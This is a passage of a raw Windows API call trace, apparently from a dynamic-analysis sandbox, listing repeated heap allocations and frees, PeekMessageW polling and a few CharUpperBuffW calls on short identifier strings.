hHeap=0x2af0000) returned 1 [0086.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0086.413] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0086.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0086.413] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0086.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0086.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0086.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0086.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0086.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0086.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0086.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0086.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73d28 | out: hHeap=0x2af0000) returned 1 [0086.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0086.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0086.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0086.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0086.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0086.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0086.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0086.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0086.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0086.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0086.414] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0086.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0086.414] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0086.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0086.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0086.414] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0086.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0086.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0086.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0086.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0086.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0086.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0086.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0086.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0086.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0086.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0086.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0086.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0086.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0086.415] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0086.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0086.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0086.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0086.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0086.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0086.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0086.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0086.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0086.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0086.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0086.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0086.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0086.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0086.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0086.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0086.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0086.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0086.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0086.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a774b8 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76db0 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a775a8 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a770d0 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a778f0 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a778c8 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0086.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0086.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0086.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0086.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0086.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0086.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0086.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0086.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0086.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76ec8 | out: hHeap=0x2af0000) returned 1 [0086.417] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76db0 [0086.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0086.417] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0086.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76db0 | out: hHeap=0x2af0000) returned 1 [0086.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90b8 [0086.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0086.417] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0086.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0086.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0086.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0086.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0086.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0086.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0086.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76db0 [0086.418] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0086.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76db0 | out: hHeap=0x2af0000) returned 1 [0086.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0086.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0086.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0086.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0086.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0086.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0086.418] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0086.418] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76db0 [0086.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0086.418] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0086.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76db0 | out: hHeap=0x2af0000) returned 1 [0086.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0086.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9328 [0086.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0086.419] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0086.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0086.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0086.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0086.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0086.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0086.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0086.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76db0 [0086.419] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0086.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76db0 | out: hHeap=0x2af0000) returned 1 [0086.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0086.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0086.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0086.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0086.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0086.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0086.419] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0086.419] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0086.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0086.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0086.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0086.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0086.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0086.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0086.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0086.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0086.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0086.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0086.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0086.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0086.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0086.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0086.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0086.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0086.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0086.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0086.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0086.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0086.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0086.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0086.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0086.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0086.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0086.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9160 [0086.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0086.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76db0 [0086.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0086.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0086.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0086.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0086.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0086.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0086.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73fb0 [0086.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76db0 | out: hHeap=0x2af0000) returned 1 [0086.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9040 [0086.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92e0 [0086.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9058 [0086.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0086.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0086.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9538 [0086.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0086.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 